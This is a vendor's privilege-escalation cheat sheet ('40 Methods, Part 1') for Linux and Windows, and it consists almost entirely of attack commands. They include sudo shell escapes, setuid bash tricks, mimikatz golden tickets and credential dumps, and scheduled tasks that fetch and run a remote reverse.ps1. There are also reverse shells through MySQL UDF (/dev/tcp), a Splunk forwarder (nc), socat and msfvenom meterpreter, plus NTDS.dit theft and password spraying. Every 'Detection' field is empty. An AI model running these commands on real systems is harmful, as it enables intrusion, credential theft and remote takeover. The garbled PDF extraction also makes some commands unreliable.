WWW.HADESS.

IO

40 METHODS FOR PRIVILEGE

ESCALATION
PART 1

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING SUDO BINARIES
Domain: No sudo vim -c ':!/bin/bash'
sudo find / etc/passwd -exec /bin/bash \;
Local Admin: Yes echo "os.execute('/bin/bash/')" > /tmp/shell.nse && sudo nmap --
script=/tmp/shell.nse
OS: Linux sudo env /bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
Type: Abusing Privileged Files sudo perl -e 'exec "/bin/bash";'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
Difficulty sudo less /etc/hosts - !bash
sudo man man - !bash
APT Used

sudo ftp - ! /bin/bash

Attacker = socat file:`tty`,raw,echo=0 tcp-listen:1234
Victim = sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane
tcp:192.168.1.105:1234
echo test > notes.txt
sudo zip test.zip notes.txt -T --unzip-command="sh -c /bin/bash"
Detection
sudo gcc -wrapper /bin/bash,-s .
HADESS | SECURE AGILE DEVELOPMENT
 ABUSING SCHEDULED TASKS
Domain: Y/N echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
chmod +x /home/user/systemupdate.sh
Local Admin: Yes Wait a while
/bin/bash -p
OS: Linux id && whoami

Type: Abusing Scheduled Tasks

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 GOLDEN TICKET WITH SCHEDULED TASKS
Domain: Yes 1.mimikatz# token::elevate
2.mimikatz# vault::cred /patch
Local Admin: Yes 3.mimikatz# lsadump::lsa /patch
4.mimikatz# kerberos::golden /user:Administrator /rc4:<Administrator
OS: Windows NTLM(step 3)> /domain:<DOMAIN> /sid:<USER SID> /sids:<Administrator
SIDS> /ticket:<OUTPUT TICKET PATH>
Type: Abusing Scheduled Tasks 5.powercat -l -v -p 443
6.schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM"
Difficulty /TN "enterprise" /TR "powershell.exe-c 'iex (iwr
http://10.10.10.10/reverse.ps1)'”
APT Used

7.schtasks /run /s DOMAIN /TN "enterprise”

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING INTERPRETER CAPABILITIES
Domain: No 1. getcap -r / 2>/dev/null
a. /usr/bin/python2.6 = cap_setuid+ep
Local Admin: Yes b. /usr/bin/python2.6 -c 'import os; os.setuid(0);
os.system("/bin/bash")'
OS: Linux c. id && whoami
2. getcap -r / 2>/dev/null
Type: Abusing Capabilities a. /usr/bin/perl = cap_setuid+ep
b. /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec
Difficulty "/bin/bash";'
c. id && whoami
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING BINARY CAPABILITIES
Domain: No 1. getcap -r / 2>/dev/null
2. /usr/bin/tar = cap dac read search+ep
Local Admin: Yes 3. /usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
4. /usr/bin/tar -xvf key.tar
OS: Linux 5. openssl req -engine /tmp/priv.so
6. /bin/bash -p
Type: Abusing Capabilities 7. id && whoami

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING ACTIVESESSIONS CAPABILITIES
Domain: No 1. https://raw.githubusercontent.com/EmpireProject/Empire/master/data
/module_source/lateral_movement/Invoke-SQLOSCmd.ps1
Local Admin: Yes 2. . .\Heidi.ps1
3. Invoke-SQLOCmd -Verbose -Command “net localgroup administrators
OS: Windows user1 /add” -Instance COMPUTERNAME

Type: Abusing Capabilities

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ESCALATE WITH TRUSTWORTHY IN SQL SERVER

Domain: Yes 1. 1. . .\PowerUpSQL.ps1

2. 2. Get-SQLInstanceLocal -Verbose

Local Admin: Yes 3. 3. (Get-SQLServerLinkCrawl -Verbos -Instance "10.10.10.10" -Query 'select * from
master..sysservers').customer.query
4. 4.
OS: Windows
5. USE "master";
6. SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM
Type: Abusing Capabilities "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF, 'IF');
7. execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN>\<DATABASE
NAME>"
Difficulty
8. 5. powershell -ep bypass
9. 6. Import-Module .\powercat.ps1
APT Used

10. 7. powercat -l -v -p 443 -t 10000

11. 8.
12. SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM
"master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF, 'IF');
13. execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN>\<DATABASE
NAME>"
Detection 14. execute('exec master..xp_cmdshell "\\10.10.10.10\reverse.exe"') at "<DOMAIN>\
<DATABASE NAME>"
HADESS | SECURE AGILE DEVELOPMENT
 ABUSING MYSQL RUN AS ROOT
Domain: Yes 1. ps aux | grep root
2. mysql -u root -p
Local Admin: Yes 3. \! chmod +s /bin/bash
4. Exit
OS: Windows 5. /bin/bash -p
6. id && whoami
Type: Abusing Services

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING JOURNALCTL
Domain: No 1. Journalctl
2. !/bin/sh
Local Admin: Yes

OS: Linux

Type: Abusing Services

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING VDS
Domain: No 1. . .\PowerUp.ps1
2. Invoke-ServiceAbuse -Name ‘vds’ -UserName ‘domain\user1’
Local Admin: Yes

OS: Windows

Type: Abusing Services

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING BROWSER
Domain: No 1. . .\PowerUp.ps1
2. Invoke-ServiceAbuse -Name ‘browser’ -UserName ‘domain\user1’
Local Admin: Yes

OS: Windows

Type: Abusing Services

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING LDAP
1. 0. exec ldapmodify -x -w PASSWORD

Domain: Yes 2. 1. paste this

3. dn: cn=openssh-lpk,cn=schema,cn=config
4. objectClass: olcSchemaConfig

Local Admin: Yes 5. cn: openssh-lpk

6. olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME 'sshPublicKey'
7. DESC 'MANDATORY: OpenSSH Public key'

OS: Linux 8. EQUALITY octetStringMatch

9. SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 )
10. olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME 'ldapPublicKey' SUP top AUXILIARY
11. DESC 'MANDATORY: OpenSSH LPK objectclass'
Type: Abusing Services 12. MAY ( sshPublicKey $ uid )
13. )
14.

Difficulty 15. 2. exec ldapmodify -x -w PASSWORD

16. 3. paste this
17. dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC
APT Used

18. changeType: modify

19. add: objectClass
20. objectClass: ldapPublicKey
21. -
22. add: sshPublicKey
23. sshPublicKey: content of id_rsa.pub
24. -
25. replace: EVIL GROUP ID
26. uidNumber: CURRENT USER ID
Detection 27. -
28. replace: EVIL USER ID

HADESS | SECURE AGILE DEVELOPMENT 29. gidNumber: CURRENT GROUP ID

 LLMNR POISONING
Domain: Yes 1. 1.responder -I eth1 -v
2. 2.create Book.url
Local Admin: Y/N 3. [InternetShortcut]
4. URL=https://facebook.com
OS: Windows 5. IconIndex=0
6. IconFile=\\attacker_ip\not_found.ico
Type: Abusing Services

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING CERTIFICATE SERVICES
Domain: Yes 1. adcspwn.exe --adcs <cs server> --port [local port] --remote
[computer]
Local Admin: Y/N 2. adcspwn.exe --adcs cs.pwnlab.local
3. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port
OS: Windows 9001
4. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --
Type: Abusing Services output C:\Temp\cert_b64.txt
5. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --
Difficulty username pwnlab.local\mranderson --password The0nly0ne! --dc
dc.pwnlab.local
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 MYSQL UDF CODE INJECTION
Domain: Yes 1. mysql -u root -p
2. mysql> use mysql;
Local Admin: Yes 3. mysql> create table admin(line blob);
4. mysql> insert into admin values(load_file('/tmp/lib_mysqludf_sys.so'));
OS: Linux 5. mysql> select * from admin into dumpfile
'/usr/lib/lib_mysqludf_sys.so';
Type: Injection 6. mysql> create function sys_exec returns integer soname
'lib_mysqludf_sys.so';
Difficulty 7. mysql> select sys_exec('bash -i >& /dev/tcp/10.10.10.10/9999 0>&1');
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 IMPERSONATION TOKEN WITH IMPERSONATELOGGEDONUSER

Domain: No 1. 1.SharpImpersonation.exe user:<user> shellcode:<URL>

2. 2.SharpImpersonation.exe user:<user>
Local Admin: Yes technique:ImpersonateLoggedOnuser

OS: Windows

Type: Injection

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 IMPERSONATION TOKEN WITH SEIMPERSONTEPRIVILEGE

Domain: No 1. 1.execute-assembly sweetpotato.exe -p beacon.exe

Local Admin: Yes

OS: Windows

Type: Injection

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 IMPERSONATION TOKEN WITH SELOADDRIVERPRIVILEGE

Domain: No 1.EOPLOADDRIVER.exe System\\CurrentControlSet\\MyService

C:\\Users\\Username\\Desktop\\Driver.sys
Local Admin: Yes

OS: Windows

Type: Injection

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 OPENVPN CREDENTIALS
Domain: No 1. locate *.ovpn

Local Admin: Yes

OS: Windows/Linux

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 BASH HISTORY
Domain: No 1. history
2. cat /home/<user>/.bash_history
Local Admin: Yes 3. cat ~/.bash_history | grep -i passw

OS: Windows/Linux

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 PACKAGE CAPTURE
Domain: No 1. tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='

Local Admin: Yes

OS: Windows/Linux

Type: Sniff

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 NFS ROOT SQUASHING
Domain: Yes 1. showmount -e <victim_ip>
2. mkdir /tmp/mount
Local Admin: Yes 3. mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
4. cd /tmp/mount
OS: Linux 5. cp /bin/bash .
6. chmod +s bash
Type: Remote Procedure Calls (RPC)

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING ACCESS CONTROL LIST
Domain: Yes 1. $user = "megacorp\jorden"
2. $folder = "C:\Users\administrator"
Local Admin: Yes 3. $acl = get-acl $folder
4. $aclpermissions = $user, "FullControl", "ContainerInherit,
OS: Windows ObjectInherit", "None", "Allow"
5. $aclrule = new-object
Type: Abuse Privilege System.Security.AccessControl.FileSystemAccessRule
$aclpermissions
Difficulty 6. $acl.AddAccessRule($aclrule)
7. set-acl -path $folder -AclObject $acl
APT Used

8. get-acl $folder | folder

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ESCALATE WITH SEBACKUPPRIVILEGE
Domain: Yes 1. import-module .\SeBackupPrivilegeUtils.dll
2. import-module .\SeBackupPrivilegeCmdLets.dll
Local Admin: Yes 3. Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit
C:\temp\ndts.dit
OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ESCALATE WITH SEIMPERSONATEPRIVILEGE
Domain: Yes 1. https://github.com/dievus/printspoofer
2. printspoofer.exe -i -c "powershell -c whoami"
Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ESCALATE WITH SELOADDRIVERPRIVILEGE
Domain: Yes FIRST:
Download https://github.com/FuzzySecurity/Capcom-

Local Admin: Yes Rootkit/blob/master/Driver/Capcom.sys

Download
https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddri
OS: Windows
ver.cpp
Download https://github.com/tandasat/ExploitCapcom
Type: Abuse Privilege change ExploitCapcom.cpp line 292
TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
to
Difficulty
TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");
then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe
APT Used

SECOND:
1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f
exe > shell.exe
2. .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
3. .\ExploitCapcom.exe
Detection 4. in msf exec `run`

HADESS | SECURE AGILE DEVELOPMENT

 ESCALATE WITH FORCECHANGEPASSWORD
Domain: Yes https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Import-Module .\PowerView_dev.ps1

Local Admin: Yes Set-DomainUserPassword -Identity user1 -verbose

Enter-PSSession -ComputerName COMPUTERNAME -Credential “”

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ESCALATE WITH GENERICWRITE
Domain: Yes $pass = ConvertTo-SecureString 'Password123#' -AsPlainText -Force
$creds = New-Object

Local Admin: Yes System.Management.Automation.PSCredential('DOMAIN\MASTER USER'), $pass)

Set-DomainObject -Credential $creds USER1 -Clear serviceprincipalname
Set-DomainObject -Credential $creds -Identity USER1 -SET
OS: Windows
@{serviceprincipalname='none/fluu'}
.\Rubeus.exe kerberoast /domain:<DOMAIN>
Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING GPO
Domain: Yes 1..\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" --Author DOMAIN\
<USER> --Command "cmd.exe" --Arguments "/c net user Administrator

Local Admin: Yes Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION"

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 PASS-THE-TICKET
Domain: Yes 1..\Rubeus.exe asktgt /user:<USET>$ /rc4:<NTLM HASH> /ptt
2.klist

Local Admin: Y/N

OS: Windows

Type: Abuse Ticket

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 GOLDEN TICKET
Domain: Yes 1.mimikatz # lsadump::dcsync /user:<USER>
2.mimikatz # kerberos::golden /user:<USER> /domain:</DOMAIN> /sid:<OBJECT

Local Admin: Y/N SECURITY ID> /rce:<NTLM HASH> /id:<USER ID>

OS: Windows

Type: Abuse Ticket

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING SPLUNK UNIVERSAL FORWARDER
Domain: Yes python PySplunkWhisperer2_remote.py --lhost 10.10.10.5 --host 10.10.15.20 --
username admin --password admin --payload '/bin/bash -c "rm /tmp/luci11;mkfifo

Local Admin: Y/N /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11"'

OS: Linux/Windows

Type: Abuse Channel

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING GDBUS
Domain: No gdbus call --system --dest com.ubuntu.USBCreator --object-path
/com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image

Local Admin: Yes /home/nadav/authorized_keys /root/.ssh/authorized_keys true

OS: Linux

Type: Abuse Channel

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 ABUSING TRUSTED DC
Domain: Yes 1. Find user in First DC
2. If port 6666 enabled

Local Admin: Y/N 3. proxychains evil-winrm -u user -p 'pass' -i 10.100.9.253 -P 6666

4. . \mimikatz. exe "privilege:: debug" "sekurlsa:: logonpasswords" "token:: elevate"
*lsadump:: secrets* *exit"
OS: Windows
5. proxychains evil-winrm -u Administrator -p 'pass dumped in step 4' -i
10.100.10.100 -P 6666
Type: Abuse Channel

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 NTLM RELAY
Domain: Yes 1. responder -I eth1 -v
2. ntlmrelayx.py …

Local Admin: Y/N

OS: Windows

Type: NTLM

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 EXCHANGE RELAY
Domain: Yes 1. responder -I eth1 -v
2. ./exchangeRelayx.py …

Local Admin: Y/N

OS: Windows

Type: NTLM

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 DUMPING WITH DISKSHADOW
Domain: Yes 1. priv.txt contain
SET CONTEXT PERSISTENT NOWRITERSp

Local Admin: Y/N add volume c: alias 0xprashantp

createp
expose %0xprashant% z:p
OS: Windows
2. exec with diskshadow /s priv.txt

Type: Dumping

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 DUMPING WITH VSSADMIN
Domain: Yes vssadmin create shadow /for=C:
copy \\?

Local Admin: Y/N \GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit

C:\ShadowCopy
copy \\?
OS: Windows
\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYS
TEM C:\ShadowCopy./kerbrute_linux_amd64 passwordspray -d domain.local --dc
Type: Dumping 10.10.10.10 domain_users.txt Password123

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 PASSWORD SPRAYING
Domain: Yes ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10
domain_users.txt Password123

Local Admin: Y/N

OS: Windows

Type: Spraying

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 AS-REP ROASTING
Domain: Yes .\Rubeus.exe asreproast

Local Admin: Y/N

OS: Windows

Type: Kerberos

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

 KERBEROASTING
Domain: Yes GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
-request

Local Admin: Y/N crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --
kerberoast output.txt

OS: Windows

Type: Kerberos

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT

About Hadess
Savior of your Business to combat cyber threats Contact Us
Hadess performs offensive cybersecurity services
through infrastructures and software that To request additional information about Hadess’s services, please fill out the form
below. A Hadess representative will contact you shortly.
include vulnerability analysis, scenario attack
planning, and implementation of custom
integrated preventive projects. We organized Website:
our activities around the prevention of corporate,
www.hadess.io
industrial, and laboratory cyber threats.
Email:
[email protected]
Phone No.
+989362181112
Company No.

+982128427515
+982177873383

hadess_security

HADESS | SECURE AGILE DEVELOPMENT

Hadess
Products and Services

SAST | Audit Your Products Penetration Testing | PROTECTION PRO

Identifying and helping to address hidden weaknesses in Fully assess your organization’s threat detection and response
your Applications. capabilities with a simulated cyber-attack.

RASP | Protect Applications and APIs Anywhere Red Teaming Operation | PROTECTION PRO
Fully assess your organization’s threat detection and response
Identifying and helping to address hidden weaknesses in
capabilities with a simulated cyber-attack.
your organization’s security.

HADESS | SECURE AGILE DEVELOPMENT

 HADESS
Secure Agile Development